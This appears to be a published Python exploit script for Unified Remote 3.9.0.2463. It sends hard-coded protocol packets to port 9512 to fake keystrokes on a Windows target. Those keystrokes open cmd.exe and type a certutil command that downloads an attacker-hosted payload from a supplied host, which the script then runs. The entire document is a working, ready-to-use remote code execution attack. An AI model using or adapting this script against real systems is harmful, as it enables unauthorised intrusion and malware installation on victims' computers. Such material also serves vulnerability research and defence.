# Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution # Author: H4rk3nz0 # Vendor Homepage: https://www.unifiedremote.com/ # Software Link: https://www.unifiedremote.com/download # Tested on: Windows 10, 10.0.19042 Build 19042 #!/usr/bin/python import socket import sys import os from time import sleep target = socket.socket(socket.AF_INET, socket.SOCK_STREAM) port = 9512 # Packet Data Declarations; Windows, Space and Enter have non-standard values open = ("00000085000108416374696f6e00000550617373776f72640038653831333362332d61313862" "2d343361662d613763642d6530346637343738323763650005506c6174666f726d00616e64726f696400" "0852657175657374000005536f7572636500616e64726f69642d64373038653134653532383463623831" "000356657273696f6e000000000a00").decode("hex") open_fin = ("000000c8000108416374696f6e0001024361706162696c69746965730004416374696f6e7" "3000104456e6372797074696f6e3200010446617374000004477269640001044c6f6164696e6700010453" "796e630001000550617373776f72640064363334633164636664656238373335363038613461313034646" "5643430373664653736366464363134343336313938303961643766333538353864343439320008526571" "75657374000105536f7572636500616e64726f69642d643730386531346535323834636238310000" ).decode("hex") one = ("000000d2000108416374696f6e00070549440052656c6d746563682e4b6579626f61726400024" "c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000656616c756" "5730002000556616c756500").decode("hex") two = ("00000000054e616d6500746f67676c6500000854797065000800000008526571756573740007" "0252756e0002457874726173000656616c7565730002000556616c756500").decode("hex") three = ("00000000054e616d6500746f67676c65000005536f7572636500616e64726f69642d643730" "386531346535323834636238310000").decode("hex") win_key = ("000000d8000108416374696f6e00070549440052656c6d746563682e4b6579626f61726" "400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617300065" "6616c7565730002000556616c7565004c57494e00000000054e616d6500746f67676c6500000854797" "0650008000000085265717565737400070252756e0002457874726173000656616c756573000200055" "6616c7565004c57494e00000000054e616d6500746f67676c65000005536f7572636500616e64726f6" "9642d643730386531346535323834636238310000").decode("hex") ret_key = ("000000dc000108416374696f6e00070549440052656c6d746563682e4b6579626f6172" "6400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000" "656616c7565730002000556616c75650052455455524e00000000054e616d6500746f67676c650000" "08547970650008000000085265717565737400070252756e0002457874726173000656616c7565730" "002000556616c75650052455455524e00000000054e616d6500746f67676c65000005536f75726365" "00616e64726f69642d643730386531346535323834636238310000").decode("hex") space_key = ("000000da000108416374696f6e00070549440052656c6d746563682e4b6579626f6" "1726400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617" "3000656616c7565730002000556616c756500535041434500000000054e616d6500746f67676c650" "00008547970650008000000085265717565737400070252756e0002457874726173000656616c756" "5730002000556616c756500535041434500000000054e616d6500746f67676c65000005536f75726" "36500616e64726f69642d643730386531346535323834636238310000").decode("hex") # ASCII to Hex Conversion Set characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", "+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} # User Specified arguments try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3] except: print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>") # Send Windows Key Input Twice def SendWin(): target.sendto(win_key,(rhost, port)) target.sendto(win_key,(rhost, port)) sleep(0.4) # Send Enter/Return Key Input def SendReturn(): target.sendto(ret_key,(rhost, port)) sleep(0.4) # Send String Characters def SendString(string, rhost): for char in string: if char == " ": target.sendto(space_key,(rhost, port)) sleep(0.02) else: convert = characters[char].decode("hex") target.sendto(one + convert + two + convert + three,(rhost, port)) sleep(0.02) # Main Execution def main(): target.connect((rhost,port)) sleep(0.5) print("[+] Connecting to target...") target.sendto(open,(rhost,port)) # Initialize Connection to Unified sleep(0.02) target.sendto(open_fin,(rhost,port)) # Finish Initializing Connection print("[+] Popping Start Menu") sleep(0.02) SendWin() sleep(0.3) print("[+] Opening CMD") SendString("cmd.exe", rhost) sleep(0.3) SendReturn() sleep(0.3) print("[+] *Super Fast Hacker Typing*") SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload, rhost) # Retrieve HTTP hosted payload sleep(0.3) print("[+] Downloading Payload") SendReturn() sleep(3) SendString("C:\\Windows\\Temp\\" + payload, rhost) # Execute Payload sleep(0.3) SendReturn() print("[+] Done! Check listener?") target.close() if __name__=="__main__": main()